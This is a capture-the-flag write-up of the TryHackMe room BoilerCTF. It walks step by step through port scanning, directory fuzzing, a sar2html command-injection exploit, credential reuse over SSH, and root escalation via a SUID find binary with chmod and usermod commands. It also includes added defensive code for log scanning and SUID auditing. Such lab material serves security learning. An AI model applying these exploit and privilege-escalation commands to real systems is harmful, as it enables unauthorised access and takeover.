BoilerCTF

Another room from TryHackMe and it’s rated as intermediate. Let’s start by running a port scan.
Enumeration
root@cyberspace:~/thm/boilerctf# nmap -T4 -sS -sV -sC -oN nmap/portscan -p- boilerctf.thm
Starting Nmap 7.80 ( https://nmap.org ) at 2019-08-26 22:41 CEST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.16 seconds

Host down... Let's see if I can ping the machine.
root@cyberspace:~/thm/boilerctf# ping boilerctf.thm
PING boilerctf.thm (10.10.238.14) 56(84) bytes of data.
64 bytes from boilerctf.thm (10.10.238.14): icmp_seq=1 ttl=63 time=38.2 ms
64 bytes from boilerctf.thm (10.10.238.14): icmp_seq=2 ttl=63 time=41.3 ms
64 bytes from boilerctf.thm (10.10.238.14): icmp_seq=3 ttl=63 time=47.6 ms
64 bytes from boilerctf.thm (10.10.238.14): icmp_seq=4 ttl=63 time=38.8 ms

Yes, I can. For those who wonder why I ping boilerctf.thm: TryHackMe gives me an hour per room. If I run out of time or restart the room I get a new IP address to attack. By adding the current IP address to /etc/hosts I can use the hostname instead of having to remember a new IP address after every change.
Because I can ping the machine, I run the port scan again, this time with the -Pn option, which tells nmap to skip host discovery and treat all hosts as online.
root@cyberspace:~/thm/boilerctf# nmap -T4 -sS -sV -sC -Pn -oN nmap/portscan -p- boilerctf.thm
Starting Nmap 7.80 ( https://nmap.org ) at 2019-08-26 22:42 CEST
Nmap scan report for boilerctf.thm (10.10.238.14)
Host is up (0.049s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.8.2.111
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
10000/tcp open  http    MiniServ 1.930 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
55007/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e3:ab:e1:39:2d:95:eb:13:55:16:d6:ce:8d:f9:11:e5 (RSA)
|   256 ae:de:f2:bb:b7:8a:00:70:20:74:56:76:25:c0:df:38 (ECDSA)
|_  256 25:25:83:f2:a7:75:8a:a0:46:b2:12:70:04:68:5c:cb (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.21 seconds
With this option active I get a better result from nmap. The following ports are open:
- 21 | FTP (vsftpd version 3.0.3)
- 80 | HTTP (Apache version 2.4.18 for Ubuntu)
- 10000 | HTTP (MiniServ version 1.930, the Webmin web server)
- 55007 | SSH (OpenSSH version 7.2p2)
FTP
From the nmap scan I can see that anonymous login is enabled on this FTP server. So let’s see if there is something useful to be found.
root@cyberspace:~/thm/boilerctf/ftp# ftp -p boilerctf.thm
Connected to boilerctf.thm.
220 (vsFTPd 3.0.3)
Name (boilerctf.thm:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lah
227 Entering Passive Mode (10,10,238,14,161,127).
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Aug 22 12:05 .
drwxr-xr-x    2 ftp      ftp          4096 Aug 22 12:05 ..
-rw-r--r--    1 ftp      ftp            74 Aug 21 15:42 .info.txt
226 Directory send OK.

There is a file with the extension txt. Had I only used ls or dir, I wouldn't have found anything, because the file is hidden (its name starts with a dot). I also used the -p option to enable passive FTP. In passive mode the client (me) initiates both the control and the data connection, whereas in active FTP the server connects back to the client from port 20 to send data, which tends to fail behind NAT or a firewall.
ftp> get .info.txt
local: .info.txt remote: .info.txt
227 Entering Passive Mode (10,10,238,14,158,87).
150 Opening BINARY mode data connection for .info.txt (74 bytes).
WARNING! 1 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
74 bytes received in 0.00 secs (16.6090 kB/s)
ftp> bye
221 Goodbye.
I downloaded the file. Now to see what’s in it.
root@cyberspace:~/thm/boilerctf/ftp# cat .info.txt
Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!

My first guess is some kind of rotation cipher: the punctuation is intact (sentence-ending dots, a colon and an exclamation mark), which suggests only the letters were transformed. There is a nifty site called CyberChef where you can run a frequency analysis attack on a sequence like this.
My first guess was correct: choosing ROT13 gives a readable string: Just wanted to see if you find it. Lol. Remember: Enumeration is the key!
No real info, so on to the next service.
Webserver
Pointing my browser at the site gives me the default Apache page. From the nmap scan I know there is a robots.txt file.

User-agent: *
Disallow: /
/tmp
/.ssh
/yellow
/not
/a+rabbit
/hole
/or
/is
/it
079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075

This is why I like CTF-based challenges: is this a rabbit hole or a puzzle that needs solving? While wrapping my head around this string, I run a web fuzzer in the background. There are many tools for this, such as Gobuster, Dirb and DirBuster. I like DirSearch a lot. It doesn't ship with Kali by default; if you want to give it a try, you can find it on GitHub.
root@cyberspace:~/TryHackMe/boiler# dirsearch -u http://boilerctf.thm -e php -f -x 400,403

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 10301

Error Log: /opt/tools/dirsearch/logs/errors-19-09-03_10-39-49.log

Target: http://boilerctf.thm

[10:39:49] Starting:
[10:40:54] 200 -   12KB - /joomla/
[10:40:54] 200 -    5KB - /joomla/administrator/
[10:40:59] 200 -  626B  - /manual/

Task Completed

I used a few flags to get a better result. The -u flag is mandatory and sets the URL to scan. The -e flag sets the extension(s) to scan for; it is mandatory too and needs at least one extension, and you can add more by separating them with commas. The -f flag forces the given extensions onto every entry of the chosen wordlist (as DirBuster can do), and the -x flag filters out HTTP response codes (400 being page not found and 403 being page is restricted; more on these codes can be found with Google). Another very useful flag is -w, which lets you choose the wordlist. For more options you can always use -h.
I could use the -r flag, which makes DirSearch scan recursively (I don't prefer that), so instead I run another targeted scan on the /joomla/ folder.
root@cyberspace:~/TryHackMe/boiler# dirsearch -u http://boilerctf.thm/joomla/ -e php -f -x 400,403

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 10301

Error Log: /opt/tools/dirsearch/logs/errors-19-09-03_11-18-07.log

Target: http://boilerctf.thm/joomla/

[11:18:08] Starting:
[11:18:22] 200 -  168B  - /joomla/_files/
[11:18:23] 200 -    5KB - /joomla/_test/
[11:18:37] 200 -    5KB - /joomla/administrator/
[11:18:39] 200 -   31B  - /joomla/administrator/logs/
[11:18:39] 200 -    5KB - /joomla/administrator/index.php/
[11:18:39] 200 -    5KB - /joomla/administrator/index.php
[11:18:48] 200 -   31B  - /joomla/bin/
[11:18:50] 200 -    3KB - /joomla/build/
[11:18:51] 200 -   31B  - /joomla/cache/
[11:18:54] 200 -   31B  - /joomla/components/
[11:18:56] 200 -    0B  - /joomla/configuration.php/
[11:19:13] 200 -   31B  - /joomla/images/
[11:19:14] 200 -   31B  - /joomla/includes/
[11:19:15] 303 -    0B  - /joomla/index.php/login/
[11:19:15] 200 -   12KB - /joomla/index.php/
[11:19:16] 200 -   12KB - /joomla/index.php
[11:19:16] 200 -    6KB - /joomla/installation/
[11:19:18] 200 -   31B  - /joomla/language/
[11:19:20] 200 -   31B  - /joomla/libraries/
[11:19:24] 200 -   31B  - /joomla/media/
[11:19:26] 200 -   31B  - /joomla/modules/
[11:19:37] 200 -   31B  - /joomla/plugins/
[11:19:53] 200 -   31B  - /joomla/templates/
[11:19:54] 200 -    2KB - /joomla/tests/
[11:19:55] 200 -   31B  - /joomla/tmp/

Task Completed

The first two hits look a bit off. Curling the first one returns some base64-encoded text.
root@cyberspace:/opt/tools/cmsmap# curl -s http://boilerctf.thm/joomla/_files/
<!DOCTYPE html>
<html>
<head>
<title>Woops</title>
</head>
<body>
<div align=center><h1 style=color:red>VjJodmNITnBaU0JrWVdsemVRbz0K</h1></div>
</body>
</html>

To decode base64 you can use an online tool or the tools that ship with Kali.

root@cyberspace:/opt/tools/cmsmap# echo "VjJodmNITnBaU0JrWVdsemVRbz0K" | base64 -d
V2hvcHNpZSBkYWlzeQo=
More base64. One more time by hand and if there is more, I’ll try a loop.
root@cyberspace:/opt/tools/cmsmap# echo "VjJodmNITnBaU0JrWVdsemVRbz0K" | base64 -d | base64 -d
Whopsie daisy
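The loop I mentioned, written out as an added example (my own code, not from the original write-up): it keeps peeling encoding layers until the result is no longer something it recognises. It knows two layers, base64 and the space-separated decimal ASCII form seen in robots.txt above, and it only accepts a base64 decode whose output is printable text, which is the check that stops it from decoding "Whopsie daisy" one time too many into binary junk. The layer names and the stop rule are my own choices.

```python
import base64
import binascii
import re
import string

BASE64_RE = re.compile(r'^[A-Za-z0-9+/]+={0,2}$')
PRINTABLE = frozenset(string.printable)

def decode_decimal_ascii(text: str):
    """'072 105 033' -> 'Hi!'. Returns None unless every whitespace-separated
    token is a decimal code for a printable ASCII character (or tab/newline)."""
    tokens = text.split()
    if not tokens or not all(tok.isdigit() for tok in tokens):
        return None
    codes = [int(tok) for tok in tokens]
    if not all(32 <= c <= 126 or c in (9, 10, 13) for c in codes):
        return None
    return ''.join(chr(c) for c in codes)

def decode_base64_text(text: str):
    """Strict base64 decode that succeeds only if the result is printable text.
    A random-looking byte blob means we have peeled one layer too many."""
    candidate = text.strip()          # tolerate the trailing newline from echo / base64
    if not BASE64_RE.match(candidate) or len(candidate) % 4:
        return None
    try:
        raw = base64.b64decode(candidate, validate=True)
        decoded = raw.decode('ascii')
    except (binascii.Error, UnicodeDecodeError):
        return None
    if not all(ch in PRINTABLE for ch in decoded):
        return None
    return decoded

# Order matters: a run of digits is tried as decimal ASCII before base64.
LAYERS = (("decimal-ascii", decode_decimal_ascii), ("base64", decode_base64_text))

def peel(text: str, max_layers: int = 10):
    """Repeatedly strip encoding layers. Returns [(layer_name, result), ...]
    in the order the layers were removed; stops when no known layer applies."""
    history = []
    for _ in range(max_layers):
        for name, decoder in LAYERS:
            result = decoder(text)
            if result is not None and result != text:
                history.append((name, result))
                text = result
                break
        else:
            break  # no decoder matched: this is as far down as we can go
    return history

def final_plaintext(text: str) -> str:
    """Convenience wrapper: the innermost result, or the input if nothing decoded."""
    history = peel(text)
    return history[-1][1] if history else text

if __name__ == "__main__":
    for name, result in peel("VjJodmNITnBaU0JrWVdsemVRbz0K"):
        print(f"{name}: {result!r}")
```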
Guess this was it, but it looks like another rabbit hole. The other folder that seemed a bit off was /_test/. Pointing my browser at that folder gives an interesting response: the page runs software called sar2html. Sar2html is a web-based front end for performance monitoring that converts sar binary data to graphical format. The last update was performed in 2013. Looking in the offline copy of Exploit Database, I can see there is a remote code execution (RCE) vulnerability.

root@cyberspace:~/TryHackMe/boiler# searchsploit sar2html
---------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                  |  Path
                                                                | (/usr/share/exploitdb/)
---------------------------------------------------------------- ----------------------------------------
Sar2HTML 3.2.1 - Remote Command Execution                       | exploits/php/webapps/47204.txt
---------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

# Exploit Title: sar2html Remote Code Execution
# Date: 01/08/2019
# Exploit Author: Furkan KAYAPINAR
# Vendor Homepage:https://github.com/cemtan/sar2html
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Centos 7

In web application you will see index.php?plot url extension.

http://<ipaddr>/index.php?plot=;<command-here> will execute
the command you entered. After command injection press "select # host"
then your command's output will appear bottom side of the scroll screen.
That’s not that hard to test.
This exploit seems to work.
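On the other side of the fence, this bug is easy to spot in the web server logs: the injected command rides in the plot query parameter, and the shell metacharacter that makes it work survives URL-encoding (';' arrives as '%3B'). Here is an added example (my own code, not part of the original write-up) that parses Apache combined-format access log lines, URL-decodes each query parameter and flags values containing shell metacharacters. The log lines are constructed to resemble the requests above, not real server logs.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# One line of Apache's combined log format: client, ident, user, [time], "request", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Characters that end the intended argument and start a new shell command.
SHELL_META = frozenset(';|&`$\n')

def parse_line(line: str):
    """Split one access-log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def parse_query(query: str):
    """'a=1&b=%3Bx' -> [('a', '1'), ('b', ';x')]; split on '&' only and decode
    each side, which is how the application sees the parameters."""
    params = []
    for pair in query.split('&'):
        if pair:
            name, _, value = pair.partition('=')
            params.append((unquote_plus(name), unquote_plus(value)))
    return params

def suspicious_params(target: str):
    """[(name, decoded_value)] for query parameters whose decoded value contains
    shell metacharacters. Decoding first is the whole point: '%3B' is ';'."""
    return [(name, value)
            for name, value in parse_query(urlsplit(target).query)
            if any(ch in SHELL_META for ch in value)]

def scan_log(lines):
    """One finding per request whose query string looks like a command-injection attempt."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        for name, value in suspicious_params(entry['target']):
            findings.append({
                'ip': entry['ip'], 'time': entry['time'], 'status': entry['status'],
                'path': urlsplit(entry['target']).path, 'param': name, 'value': value,
            })
    return findings

# Constructed sample lines modelled on the requests in this write-up (not real logs).
SAMPLE_LOG = [
    '10.8.2.111 - - [05/Sep/2019:11:30:01 +0200] "GET /joomla/_test/index.php?plot=;id HTTP/1.1" 200 5120 "-" "curl/7.64.0"',
    '10.8.2.111 - - [05/Sep/2019:11:30:09 +0200] "GET /joomla/_test/index.php?plot=%3Bcat%20log.txt HTTP/1.1" 200 5311 "-" "Mozilla/5.0"',
    '10.8.2.120 - - [05/Sep/2019:11:31:15 +0200] "GET /joomla/_test/index.php?plot=server01 HTTP/1.1" 200 5100 "-" "Mozilla/5.0"',
    '10.8.2.120 - - [05/Sep/2019:11:31:20 +0200] "GET /joomla/index.php HTTP/1.1" 200 12288 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['path']} {f['param']}={f['value']!r} -> {f['status']}")
```

A 200 response on the flagged request is worth noting: the application happily executed the parameter instead of rejecting it, and a real fix is to validate plot against the list of known hosts before it ever reaches a shell.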
With the command cat I can read the file log.txt.
It looks like credentials. I know from the nmap scan that an SSH server is running on port 55007.
root@cyberspace:~/TryHackMe/boiler# ssh basterd@boilerctf.thm -p 55007
The authenticity of host '[boilerctf.thm]:55007 ([10.10.161.72]:55007)' can't be established.
ECDSA key fingerprint is SHA256:mvrEiZlb4jqadxXJccZYZkCL/DHElLVQ74eKaSKZiRk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[boilerctf.thm]:55007,[10.10.161.72]:55007' (ECDSA) to the list of known hosts.
basterd@boilerctf.thm's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

8 packages can be updated.
8 updates are security updates.

Last login: Thu Aug 22 12:29:45 2019 from 192.168.1.199
$ id
uid=1001(basterd) gid=1001(basterd) groups=1001(basterd)

Basic enumeration starts in the home folder of the compromised user, and that is where I find another set of credentials.
basterd@Vulnerable:~$ cat backup.sh
REMOTE=1.2.3.4

SOURCE=/home/stoner
TARGET=/usr/local/backup
LOG=/home/stoner/bck.log

DATE=`date +%y\.%m\.%d\.`
USER=stoner
#superduperp@$$no1knows

ssh $USER@$REMOTE mkdir $TARGET/$DATE

if [ -d "$SOURCE" ]; then
    for i in `ls $SOURCE | grep 'data'`;do
        echo "Begining copy of" $i >> $LOG
        scp $SOURCE/$i $USER@$REMOTE:$TARGET/$DATE
        echo $i "completed" >> $LOG

        if [ -n `ssh $USER@$REMOTE ls $TARGET/$DATE/$i 2>/dev/null` ];then
            rm $SOURCE/$i
            echo $i "removed" >> $LOG
            echo "####################" >> $LOG
        else
            echo "Copy not complete" >> $LOG
            exit 0
        fi
    done
else
    echo "Directory is not present" >> $LOG
    exit 0
fi

The password sits in a comment right under the username. Switching to that user.
basterd@Vulnerable:~$ su stoner
Password:
stoner@Vulnerable:/home/basterd$ id
uid=1000(stoner) gid=1000(stoner) groups=1000(stoner),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
Does this user have sudo rights?
stoner@Vulnerable:/home/basterd$ sudo -l
User stoner may run the following commands on Vulnerable:
    (root) NOPASSWD: /NotThisTime/MessinWithYa

Another red herring. Back to his home folder.

stoner@Vulnerable:~$ ls -lah
total 16K
drwxr-x--- 3 stoner stoner 4.0K Aug 22 16:25 .
drwxr-xr-x 4 root   root   4.0K Aug 22 10:42 ..
drwxrwxr-x 2 stoner stoner 4.0K Aug 22 16:05 .nano
-rw-r--r-- 1 stoner stoner   34 Aug 21 18:05 .secret
stoner@Vulnerable:~$ cat .secret
You made it till here, well done.
Let’s see what is listening.
stoner@Vulnerable:~$ netstat -plant
(No info could be read for "-p": geteuid()=1000 but you should be root.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:55007           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:10000           0.0.0.0:*               LISTEN      -
tcp        0    476 10.10.161.72:55007      10.8.2.111:59528        ESTABLISHED -
tcp6       0      0 :::21                   :::*                    LISTEN      -
tcp6       0      0 :::55007                :::*                    LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -

Looks like a MySQL server is listening locally (port 3306, only on 127.0.0.1), but every login attempt is denied. No go here. From the earlier enumeration I saw that my current user is in the lxd group. That can be a way to escalate privileges, but in this case it looks like a rabbit hole.
Escalation of Privilege
One of the things to look at during system enumeration is files with the SUID bit set. What is the SUID bit?
SUID (Set owner User ID upon execution) is a special file permission. Normally on Linux/Unix a program runs with the access permissions of the user who started it. With the SUID bit set, the program instead runs with the permissions of the file's owner rather than those of the user who runs it.
To find files with the SUID bit set, you can run the following command:
stoner@Vulnerable:~$ find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null
-rwsr-xr-x 1 root root 38900 Mar 26 21:29 /bin/su
-rwsr-xr-x 1 root root 30112 Jul 12  2016 /bin/fusermount
-rwsr-xr-x 1 root root 26492 May 15 23:43 /bin/umount
-rwsr-xr-x 1 root root 34812 May 15 23:43 /bin/mount
-rwsr-xr-x 1 root root 43316 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 38932 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 13960 Mar 27 16:39 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-- 1 root www-data 13692 Apr  3 20:55 /usr/lib/apache2/suexec-custom
-rwsr-xr-- 1 root www-data 13692 Apr  3 20:55 /usr/lib/apache2/suexec-pristine
-rwsr-xr-- 1 root messagebus 46436 Jun 10 22:45 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 513528 Mar  4  2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 5480 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 36288 Mar 26 21:29 /usr/bin/newgidmap
-r-sr-xr-x 1 root root 232196 Feb  8  2016 /usr/bin/find
-rwsr-sr-x 1 daemon daemon 50748 Jan 15  2016 /usr/bin/at
-rwsr-xr-x 1 root root 39560 Mar 26 21:29 /usr/bin/chsh
-rwsr-xr-x 1 root root 74280 Mar 26 21:29 /usr/bin/chfn
-rwsr-xr-x 1 root root 53128 Mar 26 21:29 /usr/bin/passwd
-rwsr-xr-x 1 root root 34680 Mar 26 21:29 /usr/bin/newgrp
-rwsr-xr-x 1 root root 159852 Jun 11 01:53 /usr/bin/sudo
-rwsr-xr-x 1 root root 18216 Mar 27 16:39 /usr/bin/pkexec
-rwsr-xr-x 1 root root 78012 Mar 26 21:29 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 36288 Mar 26 21:29 /usr/bin/newuidmap

Here I used find to search recursively, starting from the root folder. The -perm flag filters on a specific permission setting; /4000 is the numeric representation of the SUID bit. Because I only want files, I used -type f, and the last flag is -exec, which lets me run a command on each file find returns. Here I used ls -ld to show the owner of each file and its timestamp (always a good indicator of which file was tampered with or created for the purpose of the challenge). Finally I ended with 2>/dev/null, which redirects stderr (the error messages, mostly permission denied) to /dev/null so they don't pollute my results.
In the list of files there is an interesting one, namely the find command itself. As shown above, find has a -exec flag that runs commands. Because the binary is SUID root, anything run through -exec runs as root. Let's test this.
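Spotting the odd one out in that list by eye works on a CTF box, but on a real system the defender's version of this check is an allowlist: compare every SUID file against the set a stock install is expected to have and report the rest. Here is an added example in Python (my own code, not part of the original write-up) that applies the same filter as find -perm /4000 -type f and flags anything not on the allowlist, root-owned files first. The allowlist is built from the stock Ubuntu 16.04 binaries in the listing above, with /usr/bin/find deliberately left off; the sample entries are constructed, and scan_filesystem is how you would feed it real data.

```python
import os
import stat

# SUID binaries a stock Ubuntu 16.04 install ships with (the listing above, minus find).
EXPECTED_SUID = frozenset({
    "/bin/su", "/bin/fusermount", "/bin/umount", "/bin/mount", "/bin/ping", "/bin/ping6",
    "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/usr/bin/sudo", "/usr/bin/pkexec", "/usr/bin/newuidmap", "/usr/bin/newgidmap", "/usr/bin/at",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/policykit-1/polkit-agent-helper-1", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/apache2/suexec-custom", "/usr/lib/apache2/suexec-pristine",
})

def is_suid_regular_file(mode: int) -> bool:
    """Same filter as `find -perm /4000 -type f`: a regular file with the set-user-ID bit."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)

def unexpected_suid(entries, expected=EXPECTED_SUID):
    """entries: iterable of (path, st_mode, st_uid). Returns [(path, uid)] for SUID
    files not on the allowlist, root-owned ones first since those hand out full privilege."""
    flagged = [(path, uid) for path, mode, uid in entries
               if is_suid_regular_file(mode) and path not in expected]
    flagged.sort(key=lambda item: (item[1] != 0, item[0]))
    return flagged

def scan_filesystem(root="/"):
    """Walk the real filesystem and collect (path, mode, uid) for every file.
    Unreadable directories are skipped, which is what 2>/dev/null hid above."""
    skip = {"/proc", "/sys", "/dev"}  # pseudo-filesystems: noisy, nothing to audit
    entries = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in skip]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            entries.append((path, st.st_mode, st.st_uid))
    return entries

# Constructed sample modelled on the listing above; modes include the S_IFREG file-type bits.
SAMPLE_ENTRIES = [
    ("/usr/bin/passwd", 0o104755, 0),    # -rwsr-xr-x root: expected
    ("/usr/bin/find", 0o104555, 0),      # -r-sr-xr-x root: NOT expected, this is the finding
    ("/usr/bin/at", 0o106755, 1),        # SUID+SGID owned by daemon: on the allowlist
    ("/usr/bin/python3", 0o100755, 0),   # no SUID bit at all
    ("/opt/helper", 0o104755, 1000),     # SUID but owned by an ordinary user (hypothetical path)
]

if __name__ == "__main__":
    for path, uid in unexpected_suid(SAMPLE_ENTRIES):
        print(f"unexpected SUID file: {path} (owner uid {uid})")
    # On a live host: unexpected_suid(scan_filesystem())
```

Run periodically and diffed against the previous result, this turns the one-off CTF trick into a change detector: a SUID bit appearing on a binary such as find is exactly the kind of event you want an alert for.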
stoner@Vulnerable:~$ find . -exec touch test.txt \;
stoner@Vulnerable:~$ ls -lah
total 20K
drwxr-x--- 4 stoner stoner 4.0K Sep  5 15:13 .
drwxr-xr-x 4 root   root   4.0K Aug 22 10:42 ..
drwx------ 2 stoner stoner 4.0K Sep  5 14:41 .cache
drwxrwxr-x 2 stoner stoner 4.0K Aug 22 16:05 .nano
-rw-r--r-- 1 stoner stoner   34 Aug 21 18:05 .secret
-rw-rw-r-- 1 root   stoner    0 Sep  5 15:13 test.txt

Here I created a file through find's -exec flag, and the result is owned by root with group stoner. I could do several things with this, but since I want access to the /root folder, I'm going to give myself access to it.
stoner@Vulnerable:~$ find . -exec chmod -R 777 /root \;
stoner@Vulnerable:~$ cd /root
stoner@Vulnerable:/root$ ls -lah
total 12K
drwxrwxrwx  2 root root 4.0K Aug 22 12:25 .
drwxr-xr-x 22 root root 4.0K Aug 22 12:22 ..
-rwxrwxrwx  1 root root   29 Aug 21 19:25 root.txt
stoner@Vulnerable:/root$ cat root.txt
It wasn't that hard, was it?

Here I changed the permissions of /root to rwxrwxrwx (777), so everyone can open the files and folders in it.
Another way of getting access to folder /root is by adding yourself to the sudo group and then escalating to root.
stoner@Vulnerable:/root$ find . -exec usermod -aG sudo stoner \;
stoner@Vulnerable:/root$ su stoner
Password:
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

stoner@Vulnerable:/root$ id
uid=1000(stoner) gid=1000(stoner) groups=1000(stoner),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
stoner@Vulnerable:/root$ sudo -l
User stoner may run the following commands on Vulnerable:
    (ALL : ALL) ALL
    (root) NOPASSWD: /NotThisTime/MessinWithYa
stoner@Vulnerable:/root$ sudo su -
[sudo] password for stoner:
root@Vulnerable:~#

One thing to remember: after being added to the sudo group I started a fresh shell with su stoner. Without this step it wouldn't work, because the running shell keeps the group membership it was given at login; the new group only shows up in a new session. After that I used sudo to become root, and because I now had full sudo rights there were no restrictions to stop me.
And there you have it. A really fun CTF-based challenge to test your skills and learn some new things.